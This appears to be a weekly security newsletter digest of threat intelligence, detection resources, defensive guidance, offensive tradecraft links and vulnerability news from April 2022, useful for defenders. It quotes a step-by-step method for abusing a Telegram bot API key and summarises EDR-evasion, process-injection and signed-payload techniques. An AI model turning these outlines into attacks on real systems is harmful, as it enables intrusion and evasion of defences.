Bluepurple Pulse: week ending April 24th
The NSO business model has shown the possible value to investors
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading).
Operationally this week two things, the first was the campaign involving stolen OAuth user tokens issued to two third-party integrators against Github. The second was that Java’s implementation of the cryptography signature algorithm ECDSA was broken allowing the spoofing of digital signatures in various situations - there will be a long tail of vulnerability as a result (see vulnerabilities section).
In the high-level this week:
The US put up a $5 million reward for information on North Korea individuals for amongst other things their cyber activity.
🇺🇸🇦🇺🇨🇦🇳🇿🇬🇧 Put out a joint alert on Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure - Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks. I do stress exploring here..
U.S. Ninth Circuit of Appeals rules that Web Scraping is Legal and does not Breach the US's Computer Fraud and Abuse Act (other laws may still apply).
Cyber vigilantism in support of Ukraine: a legal analysis - an inconclusive and blurry analysis would be my summary of the conclusions..
US Cyber Command had their annual legal (and policy) conference which is always interesting. There is a write-up from Lawfare, a recap and podcast from Duke University and the videos of the sessions - it says a lot for the rules based system that we (the west) operate to have an annual conference on such a topic as opposed to the apparent just do it attitude of our adversaries.
Not new, but a revelation to me is that Israel has a think tank called The Institute for Analysis of New Security Challenges - who’s purpose is to provide a common ground for discussion regarding both the risks and the opportunities arising in an era of rapidly expanding and developing technology.
Israeli charged in global hacker-for-hire scheme pleads guilty - charged in relation to New Delhi-based BellTroX InfoTech Services which was behind a hacking campaign that targeted lawyers, government officials, businessmen, investors and activists around the world.
Granularity in Cyber Policy Analysis - a video from Dave Aitel who I had fortune to work with 20 years ago, has a deep technical background and has now turned his attention to amongst other things some of the absurdity in cyber policy formation today.
The Cyber-Escalation Fallacy What the War in Ukraine Reveals About State-Backed Hacking - the article poses a view around the absence of escalation across the decades of strategic interaction in cyber and how it might limit the risk of conflict but why it might be primarily a way to pursue strategic goals.
The New Yorker published its long piece on How Democracies Spy on Their Citizens - basically the rise of NSO like capability from the private sector enabling governments to do what they might not otherwise be able to.
UK Government Officials Infected with Pegasus - High level indication of 🇬🇧 compromise attributed UAE, India, Cyprus, and Jordan.
Okta concluded its investigation into the January 2022 compromise - a 3rd party got rolled by teenagers and Okta dodged a bullet.
This weeks reflection has been that the NSO business model has shown the potential to investors if not semi imploding due to irresponsible governance in this instance. That is a business model where the private sector independently produces/maintains what would have been dubbed “nation state capability” for cyber offense without initial direction and control from a state has been shown viable to the investor community. There were others before NSO, there were others after - but the focus, quality, capability and scale of overt go to market is arguably what in part has made them different. But also their value in foreign policy to their host country….
So it is not a massive logical leap to see that the likelihood of similarly capable firms will emerge from other countries is pretty much certain backed by private investment. Then as with NSO you can see how these firms may be used as part of host countries foreign policy to win favour overseas when they realise what they have.
The interesting dimension for me is these firms will also likely be subject to less influence than NSO by western governments when they inevitably get used against targets deemed unacceptable.
The Wassenaar Arrangement as a control you say? There are interestingly a number of capable home countries which have not signed up to it…
Enjoying this? don’t get via e-mail? then subscribe:
Think someone else would benefit? Share:
Have a lovely Saturday
Cyber threat intelligence
Who is doing what to whom and how.
Aggregate reporting due to the ongoing conflict, although reporting seems to have slowed this week.
Cyberattack on state organizations of Ukraine using the topic "Azovstal" and the malicious program Cobalt Strike Beacon
Potential overlap between this threat actor and Trickbot due to cryptocurrency wallets.
Cyberattack on state organizations of Ukraine using the topic "Azovstal" and the malicious program Cobalt Strike Beacon
Shuckworm: Espionage Group Continues Intense Campaign Against Ukraine
This Russian threat actor shows a degree of operational security by showing command and control server hygiene as well as using multiple variants of their implants to try and likely maintain persistence.
The Russian-linked Shuckworm espionage group (aka Gamaredon, Armageddon) is continuing to mount an intense cyber campaign against organizations in Ukraine.
Shuckworm has almost exclusively focused its operations on Ukraine since it first appeared in 2014. These attacks have continued unabated since the Russian invasion of the country. While the group’s tools and tactics are simple and sometimes crude, the frequency and persistence of its attacks mean that it remains one of the key cyber threats facing organizations in the region.
Ransomware Attacks on Agricultural Cooperatives Potentially Timed to Critical Seasons
Evidence of the potential anxiety in government due to the (escalating?) geo political situation. Concerns over targeting of food production in the US at least during the key season - will be interesting to see if this was warranted.
The Federal Bureau of Investigation (FBI) is informing Food and Agriculture (FA) sector partners that ransomware actors may be more likely to attack agricultural cooperatives during critical planting and harvest seasons, disrupting operations, causing financial loss, and negatively impacting the food supply chain. . The FBI noted ransomware attacks during these seasons against six grain cooperatives during the fall 2021 harvest and two attacks in early 2022 that could impact the planting season by disrupting the supply of seeds and fertilizer.
TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies
No great revelation if you’ve been reading the reporting in this newsletter over the last little while. Just reemphasis around the ongoing campaign we have been seeing.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Treasury Department (Treasury) are issuing this joint Cybersecurity Advisory (CSA) to highlight the cyber threat associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020. This group is commonly tracked by the cybersecurity industry as Lazarus Group, APT38, BlueNoroff, and Stardust Chollima.
The ink-stained trail of GOLDBACKDOOR
Reporting on the same threat actor mentioned above targeting journalists covering North Korea.
On 18 March 2022, NK News shared multiple malicious artefacts from a spear-phishing campaign targeting journalists who specialize in the DPRK.
[We] assess with medium-high confidence that GOLDBACKDOOR is the successor of, or used in parallel with, the malware BLUELIGHT, attributed to APT37 / Ricochet Chollima. This assessment is based on technical overlaps between the two malware families and the impersonation of NK News, a South Korean news site focused on the DPRK.
The Gold Digger Hidden in the Investment Proposal
Further Chinese reporting on North Korean APT-C-26 (Lazarus) activity which builds on the US warning above about targeting crypto currency assets. The lure is the most interesting aspect as the tradecraft is pretty rudimentary.
Since last July we have captured multiple titles titled Venture Labo Investment Pitch Deck ( Protected).docx (Venture Labo Investment Proposal (Protected) . docx) bait, the main content of the document is the introduction of Venture Labo Investment Co., Ltd, a venture capital firm in Tokyo, Japan. The file is a document with remote template injection (CVE-2017-0199), when the user opens the document, the sample loads the remote template from the remote link, tricks the user into enabling macros, and then gets data from the remote address and injects it into the legitimate process Implement backdoor operations.
The attack of this activity is intended to steal cryptocurrency, which overlaps with the BlueNoroff attack load, process and IOC of the Lazarus branch organization, and should belong to the BlueNoroff organization .
Nobelium - Israeli Embassy Maldoc
A few days ago, we discovered an interesting sample that we believe is part of the Nobelium campaign, also known as Dark Halo. It contains an attractive visual lure representing a document from the Israeli embassy.
Attack against multiple institutions in South Korea
Chinese technical reporting on an information stealing operation in South Korea using a commodity capability. Someone is running a credential harvesting campaign for unknown reasons.
An attack targeting Korea Scholarship Foundation, heavy industry companies and other institutions. Attackers use phishing emails to deliver malicious payloads with quotations with the subject of "Requesting Basic Industry Quotations", in order to induce victims to decompress and execute the LokiBot stealing Trojan in the compressed package, resulting in user privacy and information disclosure.
CIA "Hive" Malicious Code Attack Control Weapon Platform Analysis Report
China’s National Computer Virus Emergency Response Centre put out reporting in Chinese on what is allegedly CIA capability. It is unclear if they actually caught it in country or just used information from the Vault7 leaks etc.
Recently, the National Computer Virus Emergency Response Centre analysed the "Hive" (Hive) malicious code attack and control weapon platform (hereinafter referred to as the "Hive platform")
The National Computer Virus Emergency Response Centre has thoroughly analysed the technical details of the honeycomb platform samples, combined with relevant information obtained from public channels, and basically completed the reproduction of typical attack scenarios on the honeycomb platform.
BlackCat/ALPHV Ransomware Indicators of Compromise
FBI reporting on the scale and also the indicators of this Ransomware-as-a-Service.
As of March 2022, BlackCat/ALPHV ransomware as a service (RaaS) had compromised at least 60 entities worldwide and is the first ransomware group to do so successfully using RUST, considered to be a more secure programming language that offers improved performance and reliable concurrent processing. BlackCat-affiliated threat actors typically request ransom payments of several million dollars in Bitcoin and Monero but have accepted ransom payments below the initial ransom demand amount. Many of the developers and money launderers for BlackCat/ALPHV are linked to Darkside/Blackmatter, indicating they have extensive networks and experience with ransomware operations.
TeamTNT targeting AWS, Alibaba
Darin Smith reports on a cryptomining operation targeting cloud platforms for compute access. It is an interesting strategy as this type of operation will likely incur less wrath from authorities in the short term (the theft of compute via cyber means) compared to more disruptive and impactful ransomware or hack and leak operations.
TeamTNT is actively modifying its scripts after they were made public by security researchers.
These scripts primarily target Amazon Web Services, but can also run in on-premise, container, or other forms of Linux instances.
The group's payloads include credential stealers, cryptocurrency miners, persistence and lateral movement.
TeamTNT scripts are also capable of disabling cloud security tools, such as Alibaba's aegis cloud security agent.
LemonDuck Targets Docker for Cryptomining Operations
Manoj Ahuje covers a different threat actor targeting Docker containerisation platforms for similar purposes.
LemonDuck, a well-known cryptomining botnet, is targeting Docker to mine cryptocurrency on Linux systems. This campaign is currently active.
It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses.
It evades detection by targeting Alibaba Cloud’s monitoring service and disabling it.
CVE-2022-22965 Spring4Shell Vulnerability Exploited to Deploy Cryptocurrency Miners
Nitesh Surana and Ashish Verma document a campaign showing a threat actor attempting to exploit one of the Spring vulnerabilities. However there is no confirmed in the wild exploitation.
We are unable confirm if the exploitation attempts we analyzed for this blog entry were successful. It should be noted that we also observed Linux payloads where the script ldr.sh attempts to stop other running cryptocurrency miners to run its own payload.
Zloader 2: The Silent Night
Vladimir Martyanov reports on a successor to the Zeus banking trojan. Once all the rage this style of operation has fallen off in recent times as banks improved their anti fraud and theft capabilites.
Zloader 2 (also known as Silent Night) is a multifunctional modular banking malware, aimed at providing unauthorized access to online banking systems, payment systems and other financial-related services. In addition to these functions it’s able to download and execute arbitrary files, steal files, inject arbitrary code to visited HTML pages and so on.
Conti Group Targets ESXi Hypervisors With its Linux Variant
Marc Elias, Jambul Tologonov and Alexandre Mundo report on a in-the-wild sample from this organised crime group targeting VMWare environments. The likelihood is that the underlying VMWare host will have EDR is the reason they have focused their engineering efforts here.
On the 4th of April 2022, we detected a sample uploaded, which triggered our threat-hunting rules. Upon further investigation, we determined the file is a Conti variant compiled for the Linux operating system targeting ESXi servers. Although, the ESXi version of Conti is not new and has been already discussed, this is the first public sample we have seen in the wild.
Mars, a red-hot information stealer
Coverage an a commodity information stealer likely for initial access broker usage as well as others looking to conduct low level cyber crime.
Mars Stealer is an information stealer sold on underground forums by MarsTeam since June 22, 2021, with the malware-as-a-service model. The malware capabilities are those of a classic stealer with a focus on cryptocurrency theft. As a quick summary, Mars Stealer is able to:
collect data from several browsers (passwords, cookies, credit cards, etc.);
steal credentials from crypto plugins, crypto wallets and 2FA plugins;
fingerprint the infected host.
It shares code with other information stealers including Arkei, Oski and Vidar.
The Karakurt Web: Threat Intel and Blockchain Analysis Reveals Extension of Conti Business Model
Insights into the operations, scale and targeting of this criminal threat actor.
As opposed to typical ransomware in which the adversary will deny a victim access to data through encryption, Karakurt is a cybercrime group which infiltrates networks and engages in extortion by stealing and threatening to release data without any attempt to encrypt. Since its first observed attacks in August 2021, Karakurt has victimized organizations across a number of industries and in at least eight countries.
How we find and understand the latent compromises within our environments.
Microsoft Sentinel KQL Queries etc.
Numerous bits of Sentinel goodness this week.
A Powerful Conditional Access Change Dashboard for Microsoft Sentinel
Create a pivot table showing all conditional access policy outcomes over the last 30 days
Summarize outbound (users connecting to other tenants) activity by listing the users and which applications they are accessing in each remote tenant
When Defender for Cloud detects a possible DNS lookup to a phishing domain attempt to find if the URL was part of an email phishing attack
Extracting Cobalt Strike from Windows Error Reporting
Great bit of work by Blake showing how to extract Cobalt Strike when a process crash occurs either accidently or deliberately.
Windows Error Reporting is the native control for handling application crashes, leaving behind some handy logging and dumps that can help track an actors presence. This entry will go through how we can extract Cobalt Strike from a Windows Error Reporting process dump. This can be a great method of detecting abnormal behaviour after a process crashed.
Detecting HAFNIUM defense evasion technique
Arturo outlines how to detect the defensive technique used by this Chinese state actor which we covered last week.
APTMalInsight: Identify and cognize APT malware based on system call information and ontology knowledge framework
Academic work on the topic of APT sample clustering which has been used by numerous researchers over the years. This work was from China and should be seen as a indicator of Chinese domestic focus on cyber defence more generally.
The evaluation results based on real APT malware samples demonstrate that the detection and clustering accuracy can reach up to 99.28% and 98.85% respectively. In addition, APTMalInsight supplies an effective cognition framework for APT malware and enhances the capability to understand APT attacks.
DecoyMini: 🐝 • Chinese binary only honeypot system
The three things which fascinate about China are:
Propensity to release only binaries
Their love for statically linking into to massive binaries
That this is the second mature binary only honeypot system with a thriving community
They have also built an incentive scheme for sharing intelligence from the honeypot network.
Diversified simulation trapping capabilities: Loosely couple basic simulation capabilities and simulation business capabilities, use simulation templates to manage industrialized and business-oriented simulation capabilities, and support the rapid deployment of new simulation capabilities through one-click import of cloud simulation templates and application. The deployment efficiency of simulation capabilities has been improved several times.
High scalability: The visual simulation orchestration engine is adopted to support the simulation ability of new network protocols or services and applications only through interface configuration, which greatly reduces the development threshold of simulation ability. Templates support sharing via the DecoyMini forum.
Sharing rewards: Users can obtain rich rewards by manually or automatically sharing simulation templates and honeypot attack intelligence data through tools.
How we proactively defend our environments.
Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark
Viktor Gazdag from NCC Group shows how to materially improve the security of Google GCP environments.
This time we will take a closer look at what the CIS Google Cloud Platform Foundation Benchmark offers against 10 of the most common GCP misconfigurations that NCC Group comes across during client assessments. These were previously discussed in our blog post called Securing Google Cloud Platform – Ten best practices . In addition, at the end of the post we will see if the CIS Benchmark is indeed in line with the recommendations from the engagements in real life. The top 10 best practices will be extended if possible with the benchmark recommendations and called out if anything is missing. The best practices are often related to misconfigurations in a service, so the post will group them together around the related service if possible.
How to recover files encrypted by Yanlouwang
Marc Rivero shows that mathmatics can win in cyber for the second time this week.
Yanluowang is a type of targeted ransomware discovered [whilst] investigating an incident on a large corporate network. [We] have found a vulnerability in the Yanluowang encryption algorithm and created a free decryptor to help victims of this ransomware with recovering their files.
.ISO Files With Office Maldocs & Protected View in Office 2019 and 2021
Didier Steven explains why we have seen .iso files used to distribute Microsoft Office maldocs. Punchline is this only changed in August 2021 to provide mark-of-web support.
One of the reasons to do this, is to evade “mark-of-web propagation”.
When a file (attached to an email, or downloaded from the Internet) is saved to disk on a Windows system, Microsoft applications will mark this file as coming from the Internet. This is done with a ZoneIdentifier Alternate Data Stream (like a “mark-of-web”).
When a Microsoft Office application, like Word, opens a document with a ZoneIdentifier ADS, the document is opened in Protected View (e.g., sandboxed).
But when an Office document is stored inside an ISO file, and that ISO has a ZoneIdentifier ADS, then Word will not open the document in Protected View.
VSTO Office Files Detection Notes
Great summary of technical indicators building on last weeks reporting on making Phishing great again using VSTO files.
A tool for Enumerating Telegram Bot Secret Messages, although the ability to use this legally in the UK at least is unclear at best due to the need for an API key and that it is a described as an “attack”.
Thanks to the implementation of the 'copyMessage' feature, we can conduct an attack with the following methodology using access to the bot api key:
Retrieve the bot 'first_name' and 'username' Telegram fields using the 'getMe' request.
Search for the bot username on Telegram. (Manual Step)
Send a simple message to the bot in the private chat on Telegram. (Manual Step)
Retrieve our user accounts 'id' that will be utilized as 'chat_id' for the private converation utilizing the 'getUpdates' request.
Finally, we will tell the bot to copy whatever quantity of messages from their malware/phishing campaign using 'from_chat_id' to our private 'chat_id' using the 'copyMessage' request.
Attack capability, techniques and tradecraft.
Adventures with KernelCallbackTable Injection
Meelo shows how KernelCallbackTable can be abused to inject shellcode in a remote process. This method of process injection was used by FinFisher/FinSpy and Lazarus.
Implementing Global Injection and Hooking in Windows
Michael Maltsev has commoditised injection and hooking on Windows in a highly accessible and stable manner.
I’m pretty satisfied with the result. I’ve been using my computer with Windhawk, which uses this global injection and hooking implementation, for several months, and I didn’t experience any stability, performance, or any other problems. I hope that Windhawk will prove itself as a reliable tool for customizing Windows programs, and I invite you to try it out.
Chinese post compromise CobaltStrike plugin which automates various tasks. We should likely plan to detect its use.
A blueprint for evading industry leading endpoint protection in 2022
Vincent Van Mieghem showing a one person war machine is still capable of upending firms with 100s of millions of dollars in investment / revenue.
In this post, I’d like to lay out a collection of techniques that together can be used to bypassed industry leading enterprise endpoint protection solutions.
Chris Au creates the one tool for Windows scheduled tasks to rule them all. Iranian use in 3..2
Scheduled task is one of the most popular attack technique in the past decade and now it is still commonly used by hackers/red teamers for persistence and lateral movement.
A number of C# tools were already developed to simulate the attack using scheduled task. I have been playing around with some of them but each of them has its own limitations on customizing the scheduled task. Therefore, this project aims to provide a C# tool (CobaltStrike execute-assembly friendly) to include the features that I need and provide enough flexibility on customizing the scheduled task.
Sudheer Varma provides a proof of concept that combines different defence evasion techniques to build better redteam payloads - embed an encrypted shellcode stub into a known signed executable and still manage to keep it signed like how the Zloader malware did on Windows.
Christian Mehlmauer released a tool to test and exploit STUN, TURN and TURN over TCP servers. This will frustrate various network boarder controls, flow analysis and packet inspection strategies I suspect.
If you find a misconfigured server you can use this tool to open a local socks proxy that relays all traffic via the TURN protocol into the internal network behind the server.
Our attack surface.
CVE-2022-21449: Psychic Signatures in Java
Signed JWTs, SAML assertions or OIDC id tokens, and even WebAuthn authentication messages can be modified when running a vulnerable Java version is the headline in this research from Neil Madden:
We then had a sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449) released, not a real app, but a good demonstrator.
Then Khaled Nassar released a proof of concept demonstrating its usage with a vulnerable client and a malicious TLS server - The malicious server presents a valid (as of 2022-04-20) cert chain for www.google.com
CVE-2022-0540 - Jira Security Advisory 2022-04-20 - Authentication bypass in Seraph
Jira and Jira Service Management are vulnerable to an authentication bypass in its web authentication framework, Jira Seraph.
Jira Core Server
Jira Software Server
Jira Software Data Center
Jira Service Management
Jira Service Management Server
Jira Service Management Data Center
When “secure” isn’t secure at all: High‑impact UEFI vulnerabilities discovered in Lenovo consumer laptops
Martin Smolár outlines vulnerabilities similar to those we have seen exploited in the past by Russia to maintain persistence.
The first two of these vulnerabilities – CVE-2021-3971, CVE-2021-3972 – affect UEFI firmware drivers originally meant to be used only during the manufacturing process of Lenovo consumer notebooks. Unfortunately, they were mistakenly included also in the production BIOS images without being properly deactivated. These affected firmware drivers can be activated by attacker to directly disable SPI flash protections (BIOS Control Register bits and Protected Range registers) or the UEFI Secure Boot feature from a privileged user-mode process during OS runtime. It means that exploitation of these vulnerabilities would allow attackers to deploy and successfully execute SPI flash or ESP implants, like LoJax or our latest UEFI malware discovery ESPecter, on the affected devices.
What is being exploited.
VMSA-2022-0011 - Server Side Template Injection in VMWare Workspace ONE and Identity Manager RCE
VMware has confirmed that exploitation of CVE-2022-22954 has occurred in the wild
Lockbit 2.0 affiliate’s new SonicWall exploit bypasses MFA
Affiliates observed to exploit a known but relatively obscure SQLi vulnerability (CVE-2019-7481 or CVE-2021-20028) in a novel manner to retrieve user session data stored in the SonicWall SSLVPN appliance
Beanstalk Farms Post-Mortem Analysis
The DeFi craziness continues
On the 17th of April 2022, the Beanstalk Protocol experienced a flash-loan attack due to a flaw in its newly introduced Curve LP Silos that compromised the protocol’s governance mechanism, ultimately permitting the attacker to conduct an emergency execution of a malicious proposal siphoning project funds.
Some other small bits and bobs which might be of interest.
The More You Know, The More You Know You Don’t Know - Google Project Zero: A Year in Review of 0-days Used In-the-Wild in 2021 - more than prior years caught
M-TRENDS 2022 Insights into Today’s Top Cyber Security Trends and Attacks
Monthly Threat Actor Group Intelligence Report, February 2022 (KOR) – Korean
Intelligence Handbook 4th Edition - A Roadmap for Building an Intelligence-Led Security Program
Which browsers are best for privacy? - Open-source tests of web browser privacy
Att&cking The Engenuity Evals (Mitre by Mitre) - a damming analysis of the recent MITRE endpoint evaluations
CISA Expands the Joint Cyber Defense Collaborative to include Industrial Control Systems Industry Expertise
Finally you get some ANSI art which seemed topical to our industry this week by a wonderful artist:
That’s all folks.. until next week..